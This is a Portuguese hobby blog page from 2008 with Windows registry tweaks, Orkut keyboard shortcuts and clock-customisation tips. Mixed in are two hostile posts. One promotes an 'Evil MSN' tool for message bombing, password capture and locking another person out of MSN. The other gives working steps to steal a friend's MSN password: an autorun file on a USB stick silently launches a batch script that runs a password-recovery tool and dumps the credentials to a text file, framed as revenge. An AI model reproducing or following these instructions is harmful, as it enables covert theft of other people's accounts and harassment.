Buscar

quinta-feira, 31 de julho de 2008

Seu nome na barra do IE

Pra quem ainda usa esse navegador pre-historico ai vai uma dica bem legal pra ele

Vai em Iniciar > Executar > (digite Regedit.exe e dê Enter)


HKEY_CURRENT_USER >
Software>
Microsoft >
Internet Explorer >
Clique sobre a palavra MAIN>

No lado direito, dê um clique com o botão direito em um lugar vazio >
clique em NOVO >
VALOR DE SEQUÊNCIA >
nomeie como "WINDOW TITLE">
clique duas vezes e escreva o seu nome>

Reinicie o IE

Orkut adiciona "acesskeys"

Com o objetivo de tornar o serviço acessível para todos o usuários, o Orkut adicionou ontem accesskeys para alguns dos links mais utilizados. Com accesskeys, você não precisa mais clicar num link para visitar diferentes páginas do Orkut.Confira abaixo as accesskeys que podem ser utilizadas no Orkut:*
alt + shift + s - recados
alt + shift + h - home
alt + shift + c - comunidades
alt + shift + b - amigos
alt + shift + p - perfil
alt + shift + l - sair

quarta-feira, 30 de julho de 2008

Evil MSN , O melhor hack para Windows Live Messenger e MSN




Ela vem com o msn bomber
(enviar milhares de mensagens repetidas),
Mudanças de nick names
(coloca teu email como sendo de outro) ,
Envio de arquivos bloqueadores
(bloqueia o MSN daquela louca que não quer falar com vc) ,
Capturadores de senhas
(rouba as senhas da condenada e muda para deixar a gata sem msn),
Criador de Emotion,
Checador se foi bloqueado pelo outro
(checa se a gata de bloqueou ou se ela realmente saiu),
Desbloqueador
(dosbloqueia o seu msn bloqueado por aquela gatinha que não te dá moral),
Descubridor se o cara está teclando com outro
(descobre se a gatinha está tc com outro lobo),
Entre outras ferramentas.


Tela do Web Desingner do blog quando o dono do blog (eu) ativei o Status Bomber:



Não sabe baixar pelo Easy Share?
Eu te ensino
1-Dessa um pouquinho
2-Digite o que esta escrito na imagem (se estiver com uma contagem regressiva espere um pouco)
3-Clique em Click here to download file
4-Se não der tente em outro navegador

terça-feira, 29 de julho de 2008

Simulador instalando o Windows XP

Este é um simulador de instalação do Windows XP , ele não modificara nada no seu HD , ele é apenas um simulador ainda em desenvolvimento!

http://w15.easy-share.com/1699763732.html

Crie o seu site de busca!

Crie um site de busca com o seu gosto (no lugar de your name coloque o nome que você quer dar ao seu site de busca)!

Clique aqui para criar!

Roubando senhas de MSN pelo Pen-Drive

Você está lá , na casa de seu amiguinho , de bobeira e lembra de uma briga que vocês tiveram. Você quer se vingar dele hackeando o MSN dele. Então aí vem a pergunta: Já estou no PC do meu amigunho , mais como eu vou pegar a senha dele?

Aí está a resposta!

--> A primeira coisa que você precisa é de um pen-driver U3 USB-Stick. (Isto é ele Funciona automaticamente)


---> Então vc Faz o Download do MSPASS aqui>>>>>>>>>>>>http://www.download3k.com/DownloadLink1-MessenPass.html

---> Abra seu pendriver e crie um documento chamado Autostart. vc deverá escrever isso nele:
---------------------------------
[Autostart]
open=launch.bat
ACTION = meuusb
---------------------------------
(Depois de escrever isto você tem que salvar o arquivo como "Autostart.inf", "meuusb" é obviamente o nome do pendriver: D)

--- Então crie uma pasta chamada mspass, nesta pasta você copiar o mspass.exe que vc baixou

--- Então você cria um arquivo . Bat, que é chamado launch.bat
neste arquivo você escreve
---------------------------------
start mspass\mspass.exe /stext mspass.txt
---------------------------------


OK isso é tudo que você tem que fazer.

você colocar o o seu pen driver em qualquer computador, o autostart.inf lançará o mspass. Depois de alguns segundos você pode remover o pendriver USB, e haverá uma arquivo novo . Txt em que o msn e a senha estará escrito.

Colocando um texto ao lado do relogio do Windows

Vai em Meu Iniciar/Painel de controle/Opções Regionais e de idiomas, na guia Opções regionais clique em Personalizar...
Ao abrir nova janela clique em Hora
No campo Formato de hora , troque "HH:mm: ss" por "HH:mm tt" (com um espaço entre "mm" e "tt" e sem aspas);
Nos campos Símbolo a.m. e Símbolo p.m. , coloque o texto desejado (o mesmo nos dois campos);Clique aplicar/ok e aplicar e ok

Desta maneira ficará seu nome do lado direito do relógio.
 

The gta br team